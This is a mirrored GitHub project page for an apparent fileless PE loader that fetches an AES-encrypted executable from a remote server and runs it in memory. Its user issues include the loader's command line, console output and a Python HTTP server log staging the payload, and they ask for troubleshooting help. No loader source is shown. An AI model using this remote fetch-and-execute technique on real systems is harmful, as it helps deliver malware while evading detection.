Giter Site home page Giter Site logo

filelesspeloader's Introduction

filelesspeloader's People

Contributors

saadahla avatar

Stargazers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

Watchers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

filelesspeloader's Issues

Failed in CryptDecrypt (2148073477)

Hello, I've got some problems with decrypt and execute into memory
This is my console output on Victim machine
FilelessPELoader.exe myremoteserverip 8888 cihper.bin key.bin

[+] Get AES Encrypted PE from myremoteserverip:8888

[+] Get AES Key from myremoteserverip:8888

[+] AES PE Address : 000002679DF64CC0

[+] AES Key Address : 000002679DF446A0

[+] Decrypt the PE
Failed in CryptDecrypt (2148073477)

[+] PE Decrypted

[+] Loading and Running PE

On server side I've got this

python3 -m http.server 8888
Serving HTTP on 0.0.0.0 port 8888 (http://0.0.0.0:8888/) ...
xxx.xxx.8.36 - - [31/Mar/2023 07:38:39] code 404, message File not found
xxx.xxx.8.36 - - [31/Mar/2023 07:38:39] "GET /cihper.bin HTTP/1.1" 404 -
xxx.xxx.8.36 - - [31/Mar/2023 07:38:39] "GET /key.bin HTTP/1.1" 200 -

but all required files into one folder. Actually I've already tested it and it worked for me but I deleted my VM...
Could u help me to solve this problem?
I was tested in on Python 3.8.10, Python 3.10.6. OS ubuntu 22 and Windows server 2016

Thanks in advanced!

loaded pe file doesn't return

Hi,

I'm loading a very simple PE file using this loader that only prints hello world but once loaded with this loaded it never returns?
The executable is loaded and i get the output on the screen but it never returns to prompt, or my printf() line after the pe is loaded and executed from memory never gets executed!

How can I make this to return properly once the loaded .exe file is returned?

Thanks

Can't even run an error

Hello, when I execute on the same machine, the client cannot be connected to the server and the server will automatically interrupt within a few seconds after the server runs. How to solve it?
image

Requirements

Please add a requirements.txt file with the following :

hashlib
pycryptodome
pycryptodomex

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    ๐Ÿ–– Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. ๐Ÿ“Š๐Ÿ“ˆ๐ŸŽ‰

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google โค๏ธ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.